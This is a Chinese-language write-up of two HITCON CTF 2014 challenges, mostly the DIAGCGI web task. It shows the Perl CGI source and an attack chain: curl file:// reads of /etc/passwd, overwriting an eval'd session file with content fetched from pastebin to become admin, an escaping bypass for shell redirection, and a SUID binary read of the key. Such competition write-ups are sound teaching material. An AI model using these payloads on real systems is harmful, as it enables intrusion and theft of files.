Vash[Trivia 10]
说明:
Find out the flag. It should be there, you know.
nc 203.66.57.167 31337
Hint:
Most (but not all) challenge's environment is same as this one.
nc连接
nc -nvv 203.66.57.167 31337
列出/home/目录下/vash/账户目录中存放有flag
HITCON{Welcome to HITCON CTF 2014!!}
DIAGCGI[WEB 68]
说明:
http://54.92.127.128:16888/
访问网页有三个功能
ping
traceroute
curl
网页源码隐藏有shell功能
借助curl支持读取本地文件
curl file:///etc/passwd
curl file://dana-na.cgi
得到脚本文件源码
网站首先判断Cookie是否存在,若不存在就创建SESSION文件
if (! defined($sessfile) )
{
if ( md5_hex($cgi->param("sechash")) =~ /^000000000000.*$/)
{
$sesshash{'user'} = 'admin';
}
else
{
$sesshash{'user'} = 'guest';
}
$sesshash{'ip'} = &get_ip;
$diagsess = md5_hex( $sesshash{'user'} . '|||' . $sesshash{'ip'} );
$cookie = "diagsess=$diagsess;";
&write_session;
print $cgi->header(-cookie => $cookie,
-expires => 'Mon, 01 Jan 1999 00:00:00 GMT',
-'cache-control' => 'no-cache',
-pragma => 'no-cache',-'location'=> 'dana-na.cgi?sechash=' );
exit 0;
否则就读取Session
else
{
print $cgi->header();
&read_session;
&print_menu;
}
注意这里session文件我们是可控的,(文件名是我们的Cookie),Session文件存放于/tmp/目录中
在执行隐藏的shell命令时,会经过这个函数
sub shell
{
$cmd = shift;
print "<pre>";
if ( $sesshash{'user'} eq 'admin' )
{
open(GG, "$cmd |") and do
{
print;
};
}
else
{
print "sorry $sesshash{'user'}! you're not admin!\n";
}
}
会判断$sesshash{'user'}是否等于admin
$sesshash{'user'}的来源在这里
sub read_session
{
undef %sesshash;
if(! -f "$SESSDIR/$sessfile")
{
print "session error!";
return;
}
open(GG, "$SESSDIR/$sessfile") and do {
while (<GG>) {
eval($_);
}
close GG;
};
}
从Cookie文件中读取得到
系统自动生成的Cookie是这样子:
$sesshash{'ip'} = '8.8.8.8';
$sesshash{'user'} = 'guest';
修改Cookie成这样子:
$sesshash{'ip'} = '8.8.8.8';
$sesshash{'user'} = 'admin';
修改借助curl实现,curl命令有参数-o可以创建文件,故使用
curl -o /tmp/{SESSION文件名,也就是我们的Cookie值} http://pastebin.com/raw.php?i=u5Spm5ZT
篡改SESSION文件,至此可以执行命令,但是执行命令缺少
while (<GG>) { }
不会有print回显,必须导出到文件看结果,而传入的所有参数又会经过以下代码:
sub safestr
{
my $str = shift;
$str =~ s/([;<>\*\|`&\$!#\(\)\[\]\{\}:'"])/\\$1/g;;
return $str;
}
过滤,测试发现
/bin/cat /etc/passwd > /tmp/123 &action=shell
会转义成
/bin/cat /etc/passwd \> /tmp/123 &action=shell
用这样的语句绕过
/bin/cat /etc/passwd \\> /tmp/123 &action=shell
可以执行命令
/bin/ls -la / \\> /tmp/123 &action=shell
列出所有文件
-r-------- 1 key www-data 41 Jul 28 08:37 key.txt
drwxr-xr-x 21 root root 4096 Jul 28 08:35 lib
drwxr-xr-x 2 root root 4096 Aug 13 16:29 lib64
drwx------ 2 root root 16384 Jun 7 10:51 lost+found
drwxr-xr-x 2 root root 4096 Jun 7 10:49 media
drwxr-xr-x 2 root root 4096 Apr 10 22:12 mnt
drwxr-xr-x 2 root root 4096 Jun 7 10:49 opt
dr-xr-xr-x 235 root root 0 Aug 13 16:29 proc
-r-sr-x--- 1 key www-data 877753 Jul 28 08:39 read_key
SUID文件读取Flag
/read_key /key.txt \> /tmp/oops &action=shell
@Le4F ::TEAM L::
Comment Closed.